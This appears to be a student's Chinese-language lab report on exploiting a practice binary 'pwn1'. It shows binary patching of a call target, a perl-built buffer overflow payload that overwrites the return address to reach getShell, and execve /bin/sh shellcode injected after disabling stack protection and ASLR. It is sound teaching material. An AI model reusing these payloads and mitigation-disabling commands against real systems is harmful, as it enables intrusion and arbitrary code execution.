20164319 刘蕴哲 Exp1 PC平台逆向破解

【实践内容概述】

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另外一个代码片断，getShell，会返回一个可用Shell。正常状况下这个代码是不会被运行的。咱们实践的目标就是想办法运行这个代码片断。咱们将学习两种方法运行这个代码片断，而后学习如何注入运行任何Shellcode。

【实践内容】

1.手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

2.利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

3.注入一个本身制做的shellcode并运行这段shellcode。

（这几种思路，基本表明现实状况中的攻击目标）

1.运行本来不可访问的代码片断

2.强行修改程序执行流

3.注入运行任意代码。

 

【基础知识】

熟悉Linux基本操做 。

认识经常使用指令,如管道（|），输入、输出重定向（>）等。

理解Bof的原理。

看懂汇编、机器指令、EIP、指令地址。

会使用gdb,vi。

 

【实践步骤】

part.1[修改程序机器指令，改变程序执行流程]

须要掌握知识点：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具

注意要点：

*NOP, JNE, JE, JMP, CMP汇编指令的机器码

*反汇编指令objdump：

objdump反汇编命令： objdump -f test //显示test的文件头信息 objdump -d test //反汇编test中的须要执行指令的那些section objdump -D test //与-d相似，但反汇编test中的全部section objdump -h test //显示test的Section Header信息 objdump -x test //显示test的所有Header信息 objdump -s test //除了显示test的所有Header信息，还显示他们对应的十六进制文件代码   xxd命令： 用vi命令打开一个文件，在vi命令模式下输入 :%!xxd //回车后，该文件会以十六进制形式显示 :%!xxd -r //参数-r是指将当前的十六进制转换为二进制

在认识了反汇编指令以后，首先咱们在桌面 /Desktop 的路径上打开终端，测试成功以后输入

objdump -d 20164319pwn1

 

对命名为“20164319pwn1”的文件进行反汇编。

*修改指令改变程序执行流程（实际举例）

这里能够看到main函数调用foo，对应机器指令为“ e8 d7ffffff”，

那咱们想让它调用getShell，只要修改“d7ffffff”为，"getShell-80484ba"对应的补码就行。

用Windows计算器，直接 47d-4ba就能获得补码，是c3ffffff。

修改可执行文件，将其中的call指令的目标地址由d7ffffff变为c3ffffff。

首先输入

vim 20164319pwn1

 

进行编辑模式以后输入

:%!xxd

将显示模式切换为16进制模式如图

定位到须要修改的地方，输入

/e8d7 

将“d7”修改成“c3”，按ESC键退出编辑模式

键入：

:%!xxd -r :wq 

转换16进制为原格式并保存 

而后再反汇编一下看看call指令是否正确调用getshell：

objdump -d 20164319pwn1 | more 

　　

 

 

part.2[经过构造输入参数，形成BOF攻击，改变程序执行流]

须要掌握知识点：堆栈结构，返回地址

这里使用修改前的pwn1文件，命名为“lyzpwn1”，因为main 函数调用 foo 函数，foo 函数中存在 Buffer overflow 漏洞，咱们的目标是让溢出的字节覆盖返回地址（以下图，当输入达到28B时产生溢出）

为了确认输入字符串哪几个字符会覆盖到返回地址，用gdb命令调试，输入一个48bit的字符串

输入

info r 

查看当前寄存器状态，发现EIP寄存器被0x35353535覆盖，即当前返回地址为5555，这就说明刚刚输入的48B字符串中，含有5的字符串溢出到了EIP中

 

精确判断字符串中的溢出位置，将“55555555”替换为“12345678”，继续调试，观察具体是哪几个数字溢出到了EIP寄存器中

发现“1234”那四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell。

为了确认用什么值来覆盖返回地址，即getShell的内存地址，反汇编时能够看到，即0804847d（代码中的顺序应为：\x7d\x84\04\08）

 紧接着，构造输入字符串，由于咱们无法经过键盘输入\x7d\x84\x04\x08这样的16进制值，因此先生成包括这样字符串的一个文件。\x0a表示回车，若是没有的话，在程序运行时就须要手工按一下回车键。

键入

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input 

 

　　

 

使用16进制指令查看文件的内容是否如预期

xxd input

将input的输入，经过管道符“|”，做为lyzpwn1的输入，得到shell

(cat input; cat) | ./lyzpwn1 

 

 

 

 

part.3[注入Shellcode并执行]

 

*shellcode就是一段机器指令（code）

 

一般这段机器指令的目的是为获取一个交互式的shell（像linux的shell或相似windows下的cmd.exe），

 

因此这段机器指令被称为shellcode。

 

在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

咱们按照实验指导的要求，复制文件命名为“4319pwn1”，并给出如下shellcode：

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\ 

准备工做，修改配置，提示找不到execstack命令，先输入命令进行安装

apt-get install execstack

而后键入如图

root@kali:~/桌面# execstack -s pwn1　　　　　　　　　　　　　　　　　　　　//设置堆栈可执行 root@kali:~/桌面# execstack -q pwn1　　　　　　　　　　　　　　　　　　　　//查询文件的堆栈是否可执行 X pwn1 root@kali:~/桌面# more /proc/sys/kernel/randomize_va_space 2 root@kali:~/桌面# echo "0" > /proc/sys/kernel/randomize_va_space　　//关闭地址随机化 root@kali:~/桌面# more /proc/sys/kernel/randomize_va_space 0 root@kali:~/桌面# 

 

*构造须要注入的Payload

Linux下有两种基本构造攻击buf的方法：

（1）retaddr + nop + shellcode

（2）nop + shellcode + retaddr

因为retaddr在缓冲区的位置是固定的，shellcode要不在它前面，要不在它后面

缓冲区小就把shellcode放后边，缓冲区大就把shellcode放前边

咱们这个buf够放这个shellcode了

结构为：nops+shellcode+retaddr。

nop一为是了填充，二是做为“着陆区/滑行区”。

咱们猜的返回地址只要落在任何一个nop上，天然会滑到咱们的shellcode。

首先，构造32个字符“A”，其后为retaddr + nop + shellcode

perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

接下来须要肯定返回地址（即/x4/x3/x2/x1）须要填什么，所以，注入这段buf如图

(cat input_shellcode;cat) | ./4319pwn1

 

再开另一个终端，用gdb来调试4319pwn1这个进程（在此以前，须要找到4319pwn1执行的进程号）

ps -ef | grep 4319pwn1　　　　//找到4319pwn1的进程号 gdb　　　　　　　　　　　　 //启动gdb调试这个进程 attach 3577　　　　　　　　//gdb关联4319pwn1这个进程，开始调试 disassemble foo　　　　　 //经过设置断点，来查看注入buf的内存地址 break *0x080484ae　　　　//在另一个终端中按下回车 c　　　　　　　　　　　　　　//continue

 

 

键入

info r esp

查看esp寄存器，肯定/x4/x3/x2/x1该填什么。

 

 

如图，看到01020304了，就是返回地址的位置0xffffd2bc。shellcode就挨着，因此地址是0xffffd2c0,xc0/xd2/xff/xff/就是咱们要找的。

*十六进制bit算法，（一开始脑子有点转不过来，差点算错，不知道瞎理解的对不对）相邻间隔4bit，换算这里bc转化为二进制“1011 1100”加上“0000 0100”异或为“1100 0000”即为“c0”

如图，得到shell:

（到此，实验部分总算是作完了）

 

【思想感悟】

这个实验从时间上看我陆陆续续作了好久，中间一直有大大小小的问题，主要仍是出于对kali和linux系统的不熟悉，在此我要感谢老师的悉心指导，以及在课下帮我排除问题的同窗和耐心指导咱们组员的小组长！！！！真的很感谢，第一次作网络对抗技术的实验，让我有点紧张和惧怕，一直迟迟不敢动手。可是对照着实验指导结合网上查资料，真正认真研究了以后，我天天研究一点，分好几天看懂了实验内容。总结一下这几天的感悟就是：有问题多问，比起在那里苦思冥想，直接上手操做得来感悟更真切！并且每一个人的机器操做方面的问题均可能不同，这样更有益于咱们排查问题，琢磨实践内容和加深对知识点的理解。虽然大致上主要要求掌握的内容我都理解了，可是也有一部分拓展内容我不是很懂。虽然实践内容在多方求证和反复研究实践下作出来了，可是这也让我认识到本身在专业知识领域的不足，下定决心要好好研究这方面的内容，此次的实践真正让我感觉到了这门课程的有趣之处（虽然头疼的地方也很多），可是我想相信好的开头会带来一个好的方向！也但愿我在之后的实验里能愈来愈熟练，作的愈来愈快，尽可能独立自主的理解所有实验内容。